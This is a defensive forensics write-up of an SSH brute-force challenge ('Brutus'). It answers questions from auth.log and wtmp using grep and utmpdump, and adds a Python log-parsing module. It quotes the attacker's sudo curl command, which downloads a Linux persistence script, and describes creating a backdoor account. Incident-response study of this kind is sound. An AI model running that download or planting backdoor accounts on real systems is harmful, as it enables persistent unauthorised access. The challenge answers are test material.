# Brutus

## **Sherlock Scenario**

In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We'll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.

Q1) Analyze the auth.log. What is the IP address used by the attacker to carry out a brute force attack?

```bash
grep -i "Failed password" auth.log
```

```bash
grep "Failed password" auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -nr
```

Answer:  65.2.161.68

Q2) The brute-force attempts were successful and the attacker gained access to an account on the server. What is the username of the account?

```bash
grep "65.2.161.68" auth.log | grep -i "Accepted Password"
```

Answer:  root

Q3) Identify the timestamp when the attacker logged in manually to the server to carry out their objectives. The login time will be different from the authentication time, and can be found in the wtmp artifact.

```bash
utmpdump wtmp | grep "root" -C 1
```

Answer:  2024-03-06 06:32:45

Q4) SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker's session for the user account from Question 2?

Answer:  37

Q5) The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?

```bash
grep -i "useradd" auth.log
```

Answer:  cyberjunkie

Q6) What is the MITRE ATT&CK sub-technique ID used for persistence by creating a new account?

Answer:  T1136.001

Q7) What time did the attacker's first SSH session end according to auth.log?

```bash
grep -i "session 37" auth.log
```

Answer:  2024-03-06 06:37:24

Q8) The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?

```bash
grep -i "cyberjunkie" auth.log | grep -i "command"
```

Answer:  /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
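As an added example (not part of the original writeup), the greps above folded into one Python module that parses an auth.log excerpt and pulls out the same facts: the brute-force source, the accepted login, the systemd-logind session and when it closed, the account created, and the sudo command. The log excerpt is constructed for this example; the hostname, PIDs and timestamps are assumptions, while the IP, user, session number and command are the values the writeup recovers.

```python
import re
from collections import Counter

# Constructed auth.log excerpt modelled on the Brutus artifact (example data, not the
# real file): hostname, PIDs and timestamps are made up; IP, user, session and command
# are the values the writeup recovers. 203.0.113.5 is unrelated background noise.
SAMPLE_AUTH_LOG = """\
Mar  6 06:31:33 host sshd[2327]: Failed password for invalid user admin from 65.2.161.68 port 46380 ssh2
Mar  6 06:31:33 host sshd[2331]: Failed password for root from 65.2.161.68 port 46392 ssh2
Mar  6 06:31:34 host sshd[2335]: Failed password for root from 65.2.161.68 port 46400 ssh2
Mar  6 06:31:35 host sshd[2340]: Failed password for backup from 203.0.113.5 port 51022 ssh2
Mar  6 06:32:44 host sshd[2491]: Accepted password for root from 65.2.161.68 port 53204 ssh2
Mar  6 06:32:44 host systemd-logind[411]: New session 37 of user root.
Mar  6 06:34:18 host useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1
Mar  6 06:37:24 host systemd-logind[411]: Removed session 37.
Mar  6 06:39:38 host sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
"""

FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port")  # Q1
ACCEPTED_RE = re.compile(r"Accepted \w+ for (\S+) from (\S+) port")                    # Q2
SESSION_RE = re.compile(r"(New|Removed) session (\d+)(?: of user ([^\s.]+))?")         # Q4/Q7
USERADD_RE = re.compile(r"useradd\[\d+\]: new user: name=([^,]+)")                     # Q5
SUDO_RE = re.compile(r"sudo:\s+(\S+) : .*COMMAND=(.*)$")                               # Q8

def timestamp(line):
    return " ".join(line.split()[:3])  # syslog "Mon DD HH:MM:SS" prefix (no year)
def brute_force_source(log, threshold=3):
    """Source with the most 'Failed password' lines, if it reaches the threshold."""
    counts = Counter(m.group(2) for m in map(FAILED_RE.search, log.splitlines()) if m)
    ip, n = counts.most_common(1)[0] if counts else (None, 0)
    return ip if n >= threshold else None
def accepted_logins_from(log, ip):
    """(timestamp, user) for each accepted authentication from the given source."""
    return [(timestamp(line), m.group(1)) for line in log.splitlines()
            if (m := ACCEPTED_RE.search(line)) and m.group(2) == ip]
def sessions(log):
    """systemd-logind session number -> user plus open/close timestamps."""
    out = {}
    for line in log.splitlines():
        if m := SESSION_RE.search(line):
            kind, sid, user = m.groups()
            entry = out.setdefault(sid, {"user": user, "opened": None, "closed": None})
            entry["opened" if kind == "New" else "closed"] = timestamp(line)
    return out
def created_accounts(log):
    return [(timestamp(line), m.group(1)) for line in log.splitlines() if (m := USERADD_RE.search(line))]
def sudo_commands(log, user=None):
    """(timestamp, invoking user, command) for sudo invocations, optionally for one user."""
    return [(timestamp(line), m.group(1), m.group(2).strip()) for line in log.splitlines()
            if (m := SUDO_RE.search(line)) and (user is None or m.group(1) == user)]
```

Run against a real auth.log by replacing the constant with the file contents; a successful login from the same source that produced the failed-password spike is the pivot that ties Q1 and Q2 together.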

